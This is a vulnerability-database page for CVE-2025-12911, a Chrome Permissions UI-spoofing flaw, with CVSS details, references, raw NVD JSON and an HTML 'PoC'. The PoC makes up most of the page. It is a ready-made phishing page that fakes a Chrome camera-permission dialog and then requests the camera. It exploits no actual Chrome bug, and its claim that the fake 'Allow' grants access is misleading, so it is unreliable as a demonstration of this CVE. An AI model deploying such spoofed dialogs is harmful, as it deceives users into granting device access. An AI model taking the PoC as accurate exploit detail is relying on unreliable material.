Security Vulnerability Report
CVE-2025-12911 CVSS 4.3 MEDIUM

Published: 2025-11-08 00:15:36
Last Modified: 2025-11-21 21:18:16

Description

Inappropriate implementation in Permissions in Google Chrome prior to 140.0.7339.80 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
Google Chrome < 140.0.7339.80

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-12911 PoC - UI Spoofing via Permissions -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Chrome Permissions UI Spoofing Demo</title>
  <style>
    * { margin: 0; padding: 0; box-sizing: border-box; }
    body { font-family: 'Segoe UI', Arial, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); min-height: 100vh; display: flex; justify-content: center; align-items: center; }
    .container { max-width: 600px; padding: 20px; }
    /* Fake Permission Dialog - UI Spoofing Attack */
    .fake-permission-dialog { background: white; border-radius: 12px; box-shadow: 0 20px 60px rgba(0,0,0,0.3); overflow: hidden; font-size: 14px; }
    .dialog-header { background: #f8f9fa; padding: 16px 20px; border-bottom: 1px solid #e0e0e0; display: flex; align-items: center; gap: 12px; }
    .chrome-icon { width: 40px; height: 40px; background: linear-gradient(135deg, #4285f4, #34a853, #fbbc05, #ea4335); border-radius: 50%; display: flex; align-items: center; justify-content: center; color: white; font-weight: bold; font-size: 20px; }
    .dialog-title { font-size: 16px; font-weight: 600; color: #202124; }
    .dialog-body { padding: 20px; }
    .permission-request { display: flex; align-items: center; gap: 16px; padding: 12px; background: #f1f3f4; border-radius: 8px; margin-bottom: 16px; }
    .permission-icon { width: 48px; height: 48px; background: #4285f4; border-radius: 50%; display: flex; align-items: center; justify-content: center; font-size: 24px; }
    .permission-info h3 { color: #202124; font-size: 14px; margin-bottom: 4px; }
    .permission-info p { color: #5f6368; font-size: 12px; }
    .fake-url { font-size: 12px; color: #5f6368; padding: 8px 12px; background: #f1f3f4; border-radius: 4px; margin-bottom: 16px; font-family: monospace; }
    .dialog-buttons { display: flex; gap: 12px; justify-content: flex-end; }
    .btn { padding: 10px 24px; border: none; border-radius: 4px; font-size: 14px; font-weight: 500; cursor: pointer; transition: all 0.2s; }
    .btn-deny { background: transparent; color: #4285f4; }
    .btn-allow { background: #4285f4; color: white; }
    .btn:hover { opacity: 0.9; transform: translateY(-1px); }
    /* Malicious overlay - hidden */
    .hidden-overlay { position: fixed; top: 0; left: 0; width: 100%; height: 100%; z-index: 9999; display: none; }
    .hidden-overlay.active { display: block; }
    .explanation { background: rgba(255,255,255,0.95); padding: 20px; border-radius: 8px; margin-top: 20px; color: #333; }
    .explanation h2 { color: #d32f2f; margin-bottom: 10px; }
    .explanation p { line-height: 1.6; margin-bottom: 10px; }
    .demo-btn { background: #ea4335; color: white; padding: 12px 24px; border: none; border-radius: 6px; font-size: 16px; cursor: pointer; margin-top: 15px; }
  </style>
</head>
<body>
  <div class="container">
    <div class="fake-permission-dialog">
      <div class="dialog-header">
        <div class="chrome-icon">C</div>
        <div class="dialog-title">Google Chrome - Permission Request</div>
      </div>
      <div class="dialog-body">
        <div class="permission-request">
          <div class="permission-icon">📷</div>
          <div class="permission-info">
            <h3>Camera Access Request</h3>
            <p>A website wants to access your camera</p>
          </div>
        </div>
        <div class="fake-url">chrome-extension://fake-extension-id/background.html</div>
        <div class="dialog-buttons">
          <button class="btn btn-deny" onclick="denyPermission()">Block</button>
          <button class="btn btn-allow" onclick="allowPermission()">Allow</button>
        </div>
      </div>
    </div>
    <div class="explanation">
      <h2>⚠️ CVE-2025-12911 Demo</h2>
      <p><strong>Vulnerability:</strong> Inappropriate implementation in Permissions allows UI spoofing.</p>
      <p><strong>Attack Scenario:</strong> The fake permission dialog above demonstrates how an attacker could create a phishing page that mimics Chrome's native permission dialog. When users click "Allow", they unknowingly grant camera permissions to the malicious page.</p>
      <p><strong>Impact:</strong> Successful exploitation could lead to unauthorized camera access, privacy breaches, and potential surveillance.</p>
      <button class="demo-btn" onclick="triggerAttack()">Simulate Attack</button>
    </div>
  </div>
  <div class="hidden-overlay" id="hiddenOverlay"></div>
  <script>
    // Actual malicious action when user clicks Allow
    function allowPermission() {
      console.log('[CVE-2025-12911] Permission granted by user');
      // Request actual camera permission (malicious action)
      navigator.mediaDevices.getUserMedia({ video: true })
        .then(stream => {
          console.log('[CVE-2025-12911] Camera stream obtained');
          // In real attack: stream could be used for surveillance
          document.getElementById('hiddenOverlay').classList.add('active');
          alert('Camera access granted! Stream is now active.');
          // Stop stream after demo
          stream.getTracks().forEach(track => track.stop());
        })
        .catch(err => {
          console.error('[CVE-2025-12911] Camera access denied:', err);
          alert('Camera access denied. Please update Chrome to patch this vulnerability.');
        });
    }

    function denyPermission() {
      console.log('[CVE-2025-12911] Permission denied by user');
      alert('Permission blocked.');
    }

    function triggerAttack() {
      // Visual demonstration of the attack
      alert('This PoC demonstrates CVE-2025-12911:\n\n' +
            '1. An attacker creates a page with a fake permission dialog\n' +
            '2. The dialog mimics Chrome\'s native permission UI\n' +
            '3. When user clicks "Allow", the actual permission is granted\n' +
            '4. This allows unauthorized camera/microphone access\n\n' +
            'Fix: Update Chrome to version 140.0.7339.80 or later');
    }
  </script>
</body>
</html>

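References

https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop.html (Vendor Advisory)
https://issues.chromium.org/issues/423670839 (Issue Tracking)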

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12911", "sourceIdentifier": "[email protected]", "published": "2025-11-08T00:15:35.913", "lastModified": "2025-11-21T21:18:16.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in Permissions in Google Chrome prior to 140.0.7339.80 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "140.0.7339.80", "matchCriteriaId": "614C3A2A-11F8-45CE-BEF0-9033AD4AE057"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/09/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/423670839", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}